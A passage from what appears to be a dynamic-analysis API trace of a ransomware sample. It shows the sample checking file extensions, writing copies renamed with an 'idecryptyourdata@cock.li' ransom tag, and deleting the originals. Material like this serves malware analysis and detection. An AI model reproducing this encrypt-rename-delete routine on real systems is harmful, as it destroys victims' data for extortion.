(lpString=".zip") returned 4 [0047.529] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.529] lstrlenW (lpString=".rar") returned 4 [0047.529] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.529] lstrlenW (lpString=".bz2") returned 4 [0047.529] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.529] lstrlenW (lpString=".7z") returned 3 [0047.530] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.530] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0047.530] lstrlenW (lpString=".dbf") returned 4 [0047.530] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.530] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0047.530] lstrlenW (lpString=".1cd") returned 4 [0047.530] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.530] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0047.530] lstrlenW (lpString=".jpg") returned 4 [0047.530] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.530] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.530] lstrlenW (lpString="Rotate1.ico") returned 11 [0047.530] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0047.531] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=894) returned 1 [0047.531] CloseHandle (hObject=0x2c8) returned 1 [0047.531] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico")) returned 0x80 [0047.531] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.531] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0047.531] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.532] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.532] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.532] GetLastError () returned 0x0 [0047.532] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x37e, lpOverlapped=0x0) returned 1 [0047.534] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x380, lpOverlapped=0x0) returned 1 [0047.534] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.535] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0xea, lpOverlapped=0x0) returned 1 [0047.535] SetEndOfFile (hFile=0x2e0) returned 1 [0047.535] CloseHandle (hObject=0x2e0) returned 1 [0047.535] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.535] SetEndOfFile (hFile=0x2c8) returned 1 [0047.536] CloseHandle (hObject=0x2c8) returned 1 [0047.536] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.537] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico")) returned 1 [0047.537] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0047.537] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0047.537] lstrlenW (lpString=".doc") returned 4 [0047.537] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.537] lstrlenW (lpString=".docx") returned 5 [0047.537] lstrcmpiW (lpString1=".docx", lpString2="1.ico") returned -1 [0047.537] lstrlenW (lpString=".pdf") returned 4 [0047.537] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.537] lstrlenW (lpString=".xls") returned 4 [0047.537] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.537] lstrlenW (lpString=".xlsx") returned 5 [0047.537] lstrcmpiW (lpString1=".xlsx", lpString2="1.ico") returned -1 [0047.537] lstrlenW (lpString=".ppt") returned 4 [0047.537] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.538] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0047.538] lstrlenW (lpString=".zip") returned 4 [0047.538] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.538] lstrlenW (lpString=".rar") returned 4 [0047.538] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.538] lstrlenW (lpString=".bz2") returned 4 [0047.538] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.538] lstrlenW (lpString=".7z") returned 3 [0047.538] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.538] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0047.538] lstrlenW (lpString=".dbf") returned 4 [0047.538] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.538] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0047.538] lstrlenW (lpString=".1cd") returned 4 [0047.538] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.538] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0047.538] lstrlenW (lpString=".jpg") returned 4 [0047.538] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.538] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0047.538] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0047.538] lstrlenW (lpString=".doc") returned 4 [0047.538] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.538] lstrlenW (lpString=".docx") returned 5 [0047.538] lstrcmpiW (lpString1=".docx", lpString2="1.ico") returned -1 [0047.538] lstrlenW (lpString=".pdf") returned 4 [0047.538] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.538] lstrlenW (lpString=".xls") returned 4 [0047.538] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.539] lstrlenW (lpString=".xlsx") returned 5 [0047.539] lstrcmpiW (lpString1=".xlsx", lpString2="1.ico") returned -1 [0047.539] lstrlenW (lpString=".ppt") returned 4 [0047.539] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.539] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0047.539] lstrlenW (lpString=".zip") returned 4 [0047.539] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.539] lstrlenW (lpString=".rar") returned 4 [0047.539] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.539] lstrlenW (lpString=".bz2") returned 4 [0047.539] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.539] lstrlenW (lpString=".7z") returned 3 [0047.539] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.539] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0047.539] lstrlenW (lpString=".dbf") returned 4 [0047.539] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.539] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0047.539] lstrlenW (lpString=".1cd") returned 4 [0047.539] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.539] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0047.539] lstrlenW (lpString=".jpg") returned 4 [0047.539] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.539] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.539] lstrlenW (lpString="Rotate2.ico") returned 11 [0047.540] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0047.540] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=894) returned 1 [0047.540] CloseHandle (hObject=0x2c8) returned 1 [0047.540] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico")) returned 0x80 [0047.540] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.540] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0047.540] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.540] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.540] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.541] GetLastError () returned 0x0 [0047.541] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x37e, lpOverlapped=0x0) returned 1 [0047.542] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x380, lpOverlapped=0x0) returned 1 [0047.543] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.544] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0xea, lpOverlapped=0x0) returned 1 [0047.544] SetEndOfFile (hFile=0x2e0) returned 1 [0047.544] CloseHandle (hObject=0x2e0) returned 1 [0047.544] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.544] SetEndOfFile (hFile=0x2c8) returned 1 [0047.545] CloseHandle (hObject=0x2c8) returned 1 [0047.546] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.546] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico")) returned 1 [0047.546] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0047.546] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0047.546] lstrlenW (lpString=".doc") returned 4 [0047.546] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.546] lstrlenW (lpString=".docx") returned 5 [0047.546] lstrcmpiW (lpString1=".docx", lpString2="2.ico") returned -1 [0047.546] lstrlenW (lpString=".pdf") returned 4 [0047.546] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.546] lstrlenW (lpString=".xls") returned 4 [0047.546] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.546] lstrlenW (lpString=".xlsx") returned 5 [0047.546] lstrcmpiW (lpString1=".xlsx", lpString2="2.ico") returned -1 [0047.547] lstrlenW (lpString=".ppt") returned 4 [0047.547] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.547] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0047.547] lstrlenW (lpString=".zip") returned 4 [0047.547] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.547] lstrlenW (lpString=".rar") returned 4 [0047.547] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.547] lstrlenW (lpString=".bz2") returned 4 [0047.547] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.547] lstrlenW (lpString=".7z") returned 3 [0047.547] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.547] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0047.547] lstrlenW (lpString=".dbf") returned 4 [0047.547] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.547] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0047.547] lstrlenW (lpString=".1cd") returned 4 [0047.547] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.547] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0047.547] lstrlenW (lpString=".jpg") returned 4 [0047.547] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.547] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0047.547] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0047.547] lstrlenW (lpString=".doc") returned 4 [0047.547] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.547] lstrlenW (lpString=".docx") returned 5 [0047.547] lstrcmpiW (lpString1=".docx", lpString2="2.ico") returned -1 [0047.547] lstrlenW (lpString=".pdf") returned 4 [0047.547] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.547] lstrlenW (lpString=".xls") returned 4 [0047.547] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.547] lstrlenW (lpString=".xlsx") returned 5 [0047.548] lstrcmpiW (lpString1=".xlsx", lpString2="2.ico") returned -1 [0047.548] lstrlenW (lpString=".ppt") returned 4 [0047.548] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.548] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0047.548] lstrlenW (lpString=".zip") returned 4 [0047.548] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.548] lstrlenW (lpString=".rar") returned 4 [0047.548] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.548] lstrlenW (lpString=".bz2") returned 4 [0047.548] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.548] lstrlenW (lpString=".7z") returned 3 [0047.548] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.548] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0047.548] lstrlenW (lpString=".dbf") returned 4 [0047.548] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.548] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0047.548] lstrlenW (lpString=".1cd") returned 4 [0047.548] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.548] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0047.548] lstrlenW (lpString=".jpg") returned 4 [0047.548] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.548] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.548] lstrlenW (lpString="Rotate3.ico") returned 11 [0047.548] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0047.549] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=894) returned 1 [0047.549] CloseHandle (hObject=0x2c8) returned 1 [0047.549] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico")) returned 0x80 [0047.549] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.549] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0047.549] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.549] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.549] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.550] GetLastError () returned 0x0 [0047.550] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x37e, lpOverlapped=0x0) returned 1 [0047.551] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x380, lpOverlapped=0x0) returned 1 [0047.552] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.552] WriteFile (in: hFile=0x2e0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0xea, lpOverlapped=0x0) returned 1 [0047.552] SetEndOfFile (hFile=0x2e0) returned 1 [0047.556] CloseHandle (hObject=0x2e0) returned 1 [0047.557] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.557] SetEndOfFile (hFile=0x2c8) returned 1 [0048.144] CloseHandle (hObject=0x2c8) returned 1 [0048.144] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0048.144] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico")) returned 1 [0048.145] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0048.145] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0048.145] lstrlenW (lpString=".doc") returned 4 [0048.145] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0048.145] lstrlenW (lpString=".docx") returned 5 [0048.145] lstrcmpiW (lpString1=".docx", lpString2="3.ico") returned -1 [0048.145] lstrlenW (lpString=".pdf") returned 4 [0048.145] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0048.145] lstrlenW (lpString=".xls") returned 4 [0048.145] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0048.145] lstrlenW (lpString=".xlsx") returned 5 [0048.145] lstrcmpiW (lpString1=".xlsx", lpString2="3.ico") returned -1 [0048.145] lstrlenW (lpString=".ppt") returned 4 [0048.145] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0048.145] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0048.145] lstrlenW (lpString=".zip") returned 4 [0048.145] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0048.145] lstrlenW (lpString=".rar") returned 4 [0048.145] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0048.145] lstrlenW (lpString=".bz2") returned 4 [0048.145] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0048.145] lstrlenW (lpString=".7z") returned 3 [0048.145] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0048.145] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0048.145] lstrlenW (lpString=".dbf") returned 4 [0048.145] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0048.145] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0048.145] lstrlenW (lpString=".1cd") returned 4 [0048.145] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0048.145] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0048.145] lstrlenW (lpString=".jpg") returned 4 [0048.145] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0048.146] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0048.146] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0048.146] lstrlenW (lpString=".doc") returned 4 [0048.146] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0048.146] lstrlenW (lpString=".docx") returned 5 [0048.146] lstrcmpiW (lpString1=".docx", lpString2="3.ico") returned -1 [0048.146] lstrlenW (lpString=".pdf") returned 4 [0048.146] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0048.146] lstrlenW (lpString=".xls") returned 4 [0048.146] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0048.146] lstrlenW (lpString=".xlsx") returned 5 [0048.146] lstrcmpiW (lpString1=".xlsx", lpString2="3.ico") returned -1 [0048.146] lstrlenW (lpString=".ppt") returned 4 [0048.146] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0048.146] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0048.146] lstrlenW (lpString=".zip") returned 4 [0048.146] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0048.146] lstrlenW (lpString=".rar") returned 4 [0048.146] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0048.146] lstrlenW (lpString=".bz2") returned 4 [0048.146] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0048.146] lstrlenW (lpString=".7z") returned 3 [0048.146] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0048.146] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0048.146] lstrlenW (lpString=".dbf") returned 4 [0048.146] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0048.146] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0048.146] lstrlenW (lpString=".1cd") returned 4 [0048.146] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0048.146] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0048.146] lstrlenW (lpString=".jpg") returned 4 [0048.146] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0048.146] lstrcmpiW (lpString1=".mzz", lpString2=".bat") returned 1 [0048.147] lstrlenW (lpString="netfx_Core.mzz") returned 14 [0048.147] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0048.147] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=181483595) returned 1 [0048.147] CloseHandle (hObject=0x2c8) returned 1 [0048.147] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz")) returned 0x80 [0048.147] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.147] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0048.147] CreateFileW 